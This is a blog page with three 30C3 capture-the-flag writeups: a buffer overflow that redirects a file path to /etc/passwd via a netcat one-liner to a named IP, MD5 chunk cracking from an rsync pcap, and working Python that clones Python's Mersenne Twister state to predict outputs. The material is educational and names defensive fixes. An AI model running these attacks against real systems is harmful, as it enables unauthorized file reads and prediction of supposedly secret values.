A disturbing lack of taste. Just another WordPress site

30 Dec 2013

30C3 CTF – DOGE1 Writeup

This challenge was a pwn one. We have a remote server that offers a doge service: you can give the dog a name, feed it, show its image, and so on. The image shown is ASCII art read from a file whose path can be overwritten by overflowing the doge's name, like this:

perl -e 'print "A"x32 . "/etc//////////////passwd"' | nc 88.198.89.218 1024

Now the new doge's "face" will be /etc/passwd, which shows us the flag:

doge:30C3_51dd250e0adb864ff40cc40b818852f4:1001:1001:,,,:/home/doge:/bin/false

I put so many slashes in /etc/passwd because, for this to work, the new path needs to have exactly as many characters as the original file name 'ascii_art_doge_color.txt'. The overflow only overwrites as many bytes as you send, so with a plain /etc/passwd the tail of the old name survives and the server would open '/etc/passwdoge_color.txt' instead. Repeated slashes are harmless because the kernel collapses them when resolving the path.
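To make the length argument concrete, here is an added example (my own code, not the challenge binary or the writeup's one-liner) that models the name buffer and the file path as adjacent memory. The 32-byte name size and the layout are assumptions taken from the writeup's 32 'A's; the bounded copy next to the buggy one is the fix a defender would want in the service.

```python
import os

NAME_SIZE = 32                                   # assumed size of the name buffer
ORIGINAL_PATH = b"ascii_art_doge_color.txt"      # file name given in the writeup


class DogeService:
    """Toy model (constructed for this example) of the service's memory:
    a 32-byte name buffer immediately followed by the NUL-terminated path
    of the ASCII-art file that 'show image' opens."""

    def __init__(self):
        self.mem = bytearray(NAME_SIZE + len(ORIGINAL_PATH) + 1)
        self.mem[NAME_SIZE:NAME_SIZE + len(ORIGINAL_PATH)] = ORIGINAL_PATH

    def set_name_unbounded(self, data: bytes) -> None:
        """The bug: the copy is limited by the input length, not by the buffer,
        so anything past 32 bytes lands in the path that follows."""
        if len(data) > len(self.mem):
            raise ValueError("write past the modelled memory")
        self.mem[:len(data)] = data

    def set_name_bounded(self, data: bytes) -> None:
        """The fix: copy at most NAME_SIZE - 1 bytes and always keep a terminator,
        so the path after the buffer can never be touched."""
        data = data[:NAME_SIZE - 1]
        self.mem[:NAME_SIZE] = data + b"\x00" * (NAME_SIZE - len(data))

    def face_path(self) -> bytes:
        """The path the service would open: bytes after the name, up to the NUL."""
        end = self.mem.index(0, NAME_SIZE)
        return bytes(self.mem[NAME_SIZE:end])


def path_opened(name: bytes, bounded: bool = False) -> bytes:
    """Path the modelled service opens after setting the given name."""
    svc = DogeService()
    (svc.set_name_bounded if bounded else svc.set_name_unbounded)(name)
    return svc.face_path()


def resolved_path(name: bytes) -> str:
    """Same, after collapsing repeated slashes the way the kernel does."""
    return os.path.normpath(path_opened(name).decode())


def padded_target(target: bytes) -> bytes:
    """Pad a target path with extra slashes so it is exactly as long as the
    original file name (this reproduces the writeup's observation)."""
    if len(target) > len(ORIGINAL_PATH):
        raise ValueError("target longer than the original path")
    directory, _, leaf = target.rpartition(b"/")
    return directory + b"/" * (len(ORIGINAL_PATH) - len(target) + 1) + leaf


if __name__ == "__main__":
    print(path_opened(b"A" * NAME_SIZE + b"/etc/passwd"))             # leftover tail
    print(resolved_path(b"A" * NAME_SIZE + padded_target(b"/etc/passwd")))
    print(path_opened(b"A" * NAME_SIZE + b"/etc/passwd", bounded=True))  # unchanged
```

With the unbounded copy, a short replacement path keeps the tail of the old name, which is exactly the '/etc/passwdoge_color.txt' the writeup describes; with the bounded copy the path stays 'ascii_art_doge_color.txt' no matter what name is sent.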

Credit goes to immerse, who solved it first. Razor4x

30 Dec 2013

30C3 CTF – rsync Writeup

The task gives us a pcap containing a small rsync session. Looking into it, we see that the rsync client is trying to retrieve a file from the module "flag", but no file is actually transferred. Looking in Wireshark at the biggest block, 412 bytes long, you will see some interesting things. First I extracted the hex stream of the packet and replaced the 00 bytes with | to make it clearer. After that you can see some MD5 hashes "padded" with strings like "ba04..." or "ba05...", except one. Like this:

ba 05 01 30    e1906c422714eb1385315767c466f30b (30C)
ba 05 01 32    aa557033e5bc8091a88db5915c8a04bb (2d7)
ba 05 01 33    2e1c6ef401c6f4e66790a9df179b885f (1b4)
ba 05 01 36    1543843a4723ed2ab08e18053ae6dc5b (395)
ba 05 01 37    a23e10ddc6117ee143b1241b024c7e54 (8e9)
ba 05 01 39    17b9d2ad2691d639cacb18811c7f1add (c67)

ba 04 02 30 31  bf9eef1e9fe88aa3a54c6ca03e862b12 (3_b)
ba 04 02 30 34  f79921bbae40a577928b76d2fc3edc2a (688)
ba 04 02 30 35  013d407166ec4fa56eb1e1f8cbe183b9 (138)
ba 04 02 31 30  a4d751f128596dee5517d8a007e6ea02 (be4)
ba 04 02 31 31  b597e5b0e7970deda3d6cf8017b929b7 (a7e)
ba 04 02 31 32  e3a52fecab0b4e8125873849cd99103a (e\x0a\x00)

c0 fe ff       39c4de73711fea02c5468558541ea581 (5db)

Now, cracking those hashes is fairly easy: just google them. They are all 3-character strings, and putting them together as I did above clearly gives the flag. But this isn't enough: they are shuffled, and we need to put them in the correct order. First we can immediately recognise the start and the end. All flags in this CTF start with 30C3_, so the start is 30C + 3_b (e1906c422714eb1385315767c466f30b + bf9eef1e9fe88aa3a54c6ca03e862b12), while the end is 'e' (e3a52fecab0b4e8125873849cd99103a) because it is followed by the terminator characters (newline + null byte) that end a string.

I coded a little script to find this last hash, since google failed:

http://pastebin.com/9UN6V8MT

To retrieve the indexes to sort the others, just look at the offset (remember the "padding"?) and the last numbers, e.g.:

ba 04 02 30 35  013d407166ec4fa56eb1e1f8cbe183b9 (138)

this part of the flag has index '05' because the last 2 bytes are 0x30 0x35, the ASCII string "05"

ba 04 02 31 31  b597e5b0e7970deda3d6cf8017b929b7 (a7e)

this part of the flag has index '11' because the last 2 bytes are 0x31 0x31, the ASCII string "11"

ba 05 01 33    2e1c6ef401c6f4e66790a9df179b885f (1b4)

this part of the flag has index '3' because the last byte is 0x33, the ASCII character "3"

and so on for the others. Now that we have the index of every single part of the flag, just sort them and the final string will be: 30C3_b2d71b46881383958e95dbc67be4a7ee
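The whole procedure (crack the 3-byte chunks, read the index digits, reorder) in one script, as an added example that is my own code and not the writeup's pastebin script. It embeds the thirteen records exactly as listed above, brute-forces 3-byte strings over a charset instead of googling (the charset is my choice: digits, letters, underscore, newline and NUL), and places the single chunk without an index digit, the 'c0 fe ff' one, into the only gap in the sequence; that last step is my reading, since the writeup does not say how that chunk gets its position.

```python
import hashlib
import itertools
import string

# The thirteen records from the 412-byte block, as listed in the writeup:
# the leading bytes of each record (hex) and the MD5 that follows them.
RECORDS = [
    ("ba050130", "e1906c422714eb1385315767c466f30b"),
    ("ba050132", "aa557033e5bc8091a88db5915c8a04bb"),
    ("ba050133", "2e1c6ef401c6f4e66790a9df179b885f"),
    ("ba050136", "1543843a4723ed2ab08e18053ae6dc5b"),
    ("ba050137", "a23e10ddc6117ee143b1241b024c7e54"),
    ("ba050139", "17b9d2ad2691d639cacb18811c7f1add"),
    ("ba04023031", "bf9eef1e9fe88aa3a54c6ca03e862b12"),
    ("ba04023034", "f79921bbae40a577928b76d2fc3edc2a"),
    ("ba04023035", "013d407166ec4fa56eb1e1f8cbe183b9"),
    ("ba04023130", "a4d751f128596dee5517d8a007e6ea02"),
    ("ba04023131", "b597e5b0e7970deda3d6cf8017b929b7"),
    ("ba04023132", "e3a52fecab0b4e8125873849cd99103a"),
    ("c0feff", "39c4de73711fea02c5468558541ea581"),
]

# Characters a chunk may contain (my assumption); newline and NUL cover the
# terminator carried by the last chunk.
CHARSET = (string.digits + string.ascii_letters + "_").encode() + b"\n\x00"


def build_md5_table(charset: bytes = CHARSET, length: int = 3) -> dict:
    """Precompute MD5 -> plaintext for every 3-byte string over the charset
    (65**3, about 275k entries); one table serves every lookup."""
    return {hashlib.md5(bytes(c)).hexdigest(): bytes(c)
            for c in itertools.product(charset, repeat=length)}


def chunk_index(prefix_hex: str):
    """Position of a chunk in the flag: the ASCII digits after the 3-byte
    'ba xx yy' prefix ('3035' -> "05" -> 5). The 'c0 fe ff' record has none."""
    raw = bytes.fromhex(prefix_hex)
    if raw[0] != 0xBA:
        return None
    digits = raw[3:]
    if not digits.isdigit():
        raise ValueError(f"unexpected index bytes in {prefix_hex}")
    return int(digits.decode())


def reassemble(records, table) -> str:
    """Crack each chunk, place it by index, drop the unindexed chunk into the
    only gap, and strip the newline+NUL terminator of the last chunk."""
    placed, loose = {}, []
    for prefix, digest in records:
        plain = table.get(digest)
        if plain is None:
            raise ValueError(f"could not crack {digest}")
        idx = chunk_index(prefix)
        if idx is None:
            loose.append(plain)
        else:
            placed[idx] = plain
    gaps = [i for i in range(len(records)) if i not in placed]
    if len(gaps) != len(loose):
        raise ValueError("cannot place the unindexed chunks unambiguously")
    for i, plain in zip(gaps, loose):
        placed[i] = plain
    flag = b"".join(placed[i] for i in range(len(records)))
    return flag.rstrip(b"\n\x00").decode()


def solve(records=RECORDS) -> str:
    """Full pipeline on the embedded records."""
    return reassemble(records, build_md5_table())


if __name__ == "__main__":
    print(solve())
```

Building the table once and looking up every digest in it is cheaper than hashing the charset per record, and the gap check makes the script refuse to guess if more than one chunk lacks an index.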

Razor4x

30 Dec 2013

30C3 CTF – guess Writeup

In this challenge we have a guessing game based on a Python server. To win, we have to guess correctly 10 times consecutively. The random number is produced by the Python random module, seeded with a number from os.urandom. The number we have to guess is produced by getrandbits(64), which outputs a 64-bit number. Luckily for us, this function is backed by the Mersenne Twister generator, which is known to be predictable: once enough of its output has been observed, its internal state can be reconstructed. For further information on how the PRNG, MT, and randomness in Python work, have a look at these links:

http://blog.ptsecurity.com/2012/10/random-number-security-in-python.html

http://jazzy.id.au/default/2010/09/22/cracking_random_number_generators_part_3.html

Now basically what we are going to do is:

- build a random object on the client

- from the outputs the server gives us, recover the internal state of the object on the server

- replace the internal state of our client-side object with the one obtained from the server

- generate the next numbers and send them to the server to get the flag

Code (highly commented):

http://pastebin.com/3rmZmZRL
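The four steps above, as an added example that is my own code and not the pastebin script. It uses only the standard MT19937 tempering constants and CPython's documented state tuple; the stand-in "server" is constructed here and seeded from os.urandom like the challenge. The point for a defender is the same one the writeup makes: 312 observed 64-bit values are enough to reproduce every later value, which is why anything secret must come from secrets or random.SystemRandom rather than the default generator.

```python
import os
import random

MASK32 = 0xFFFFFFFF


def temper(y: int) -> int:
    """MT19937 output tempering, applied to each 32-bit state word."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & MASK32


def untemper(y: int) -> int:
    """Invert temper(): recover the raw state word from one 32-bit output."""
    y ^= y >> 18
    y ^= (y << 15) & 0xEFC60000
    r = y
    for _ in range(5):            # each pass recovers 7 more low bits
        r = y ^ ((r << 7) & 0x9D2C5680)
    y = r & MASK32
    r = y
    for _ in range(3):            # each pass recovers 11 more high bits
        r = y ^ (r >> 11)
    return r & MASK32


def clone_from_outputs(outputs64) -> random.Random:
    """Rebuild the server's generator from 312 consecutive getrandbits(64)
    values. CPython assembles a 64-bit value from two 32-bit MT outputs, least
    significant word first, so 312 values cover the whole 624-word state."""
    if len(outputs64) != 312:
        raise ValueError("need exactly 312 consecutive 64-bit outputs")
    words = []
    for v in outputs64:
        words.append(untemper(v & MASK32))
        words.append(untemper(v >> 32))
    clone = random.Random()
    # State tuple is (version, 624 words + index, gauss_next). Index 624 means
    # the next call regenerates the block, which is where the server is now.
    clone.setstate((3, tuple(words) + (624,), None))
    return clone


def predict_next(outputs64, count: int = 10) -> list:
    """The server's next `count` getrandbits(64) values."""
    clone = clone_from_outputs(outputs64)
    return [clone.getrandbits(64) for _ in range(count)]


def simulate_round(seed=None, rounds: int = 10) -> bool:
    """Constructed stand-in for the server: seeded like the challenge, hands
    out 312 numbers, then checks our predictions against its next ones."""
    if seed is None:
        seed = int.from_bytes(os.urandom(8), "big")
    server = random.Random(seed)
    observed = [server.getrandbits(64) for _ in range(312)]
    guesses = predict_next(observed, rounds)
    answers = [server.getrandbits(64) for _ in range(rounds)]
    return guesses == answers


if __name__ == "__main__":
    print("10 consecutive correct guesses:", simulate_round())
```

The untemper loops are the usual bit-by-bit inversions of the two shift-and-mask steps; the other two steps invert with a single XOR because their shifts exceed half the word width.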

Flag: 30C3_b9b1579866cccd28b1918302382c9107

Razor4x
